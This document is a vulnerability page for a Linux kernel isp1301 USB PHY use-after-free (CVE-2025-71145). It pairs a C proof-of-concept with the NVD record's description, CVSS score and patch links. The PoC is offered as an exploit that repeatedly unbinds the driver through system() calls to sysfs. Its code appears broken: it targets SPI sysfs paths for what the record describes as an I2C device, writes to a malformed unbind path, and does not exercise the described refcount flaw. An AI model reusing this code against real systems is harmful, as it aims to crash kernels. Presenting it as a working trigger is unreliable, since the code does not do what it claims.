CVE-2025-71145

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <errno.h> /* * CVE-2025-71145 PoC - Linux kernel isp1301 USB PHY driver use-after-free * This PoC demonstrates the reference count imbalance in non-OF path * Compile: gcc -o cve_2025_71145_poc cve_2025_71145_poc.c */ #define ISP1301_MODULE_PATH "/sys/bus/spi/drivers/isp1301_udc" int trigger_driver_unbind() { int fd; char buf[256]; /* Attempt to trigger driver unbind sequence */ fd = open(ISP1301_MODULE_PATH, O_RDONLY); if (fd < 0) { /* Try alternative method via sysfs */ snprintf(buf, sizeof(buf), "echo %s > /sys/bus/spi/drivers/unbind 2>/dev/null", "spi0.0"); system(buf); } else { close(fd); } return 0; } int main(int argc, char *argv[]) { int iterations = 1000; int i; printf("[*] CVE-2025-71145 PoC - isp1301 reference count imbalance\n"); printf("[*] Target: Linux kernel isp1301 USB PHY driver\n"); printf("[*] Vulnerability: Use-after-free due to missing get_device() call\n"); if (geteuid() != 0) { printf("[!] Warning: This PoC requires root privileges\n"); printf("[!] Continuing anyway for demonstration purposes...\n"); } /* * Race condition trigger: * In non-OF path, isp1301_get_client() doesn't increment device refcount * When driver unbinds, put_device() may free device while still in use */ for (i = 0; i < iterations; i++) { trigger_driver_unbind(); usleep(1000); /* Small delay to increase race window */ if (i % 100 == 0) { printf("[*] Iteration %d/%d\n", i, iterations); } } printf("[*] PoC execution completed\n"); printf("[!] Check dmesg for kernel oops or BUG messages\n"); return 0; }

{"cve": {"id": "CVE-2025-71145", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T14:16:12.873", "lastModified": "2026-02-26T20:25:27.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nusb: phy: isp1301: corregir desequilibrio de referencia de dispositivo no-OF\n\nUn cambio reciente que corregía una fuga de referencia de dispositivo en un controlador UDC introdujo un potencial uso después de liberación en el caso no-OF, ya que la función auxiliar isp1301_get_client() solo incrementa el contador de referencias para el dispositivo I2C devuelto en el caso OF.\n\nIncrementar el contador de referencias también para no-OF para que el llamador pueda decrementarlo incondicionalmente.\n\nTenga en cuenta que esto es inherentemente propenso a condiciones de carrera, al igual que lo es usar el dispositivo I2C devuelto, ya que nada impide que el controlador PHY sea desvinculado mientras está en uso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.248", "versionEndExcluding": "5.11", "matchCriteriaId": "27953D46-F1BA-44DF-8344-E000813BC82B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/03bbdaa4da8c6ea0c8431a5011db188a07822c8a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/43e58abad6c08c5f0943594126ef4cd6559aac0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d3df03f70547d4e3fc10ed4381c052eff51b157", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7501ecfe3e5202490c2d13dc7e181203601fcd69", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/75c5d9bce072abbbc09b701a49869ac23c34a906", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b4b64fda4d30a83a7f00e92a0c8a1d47699609f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}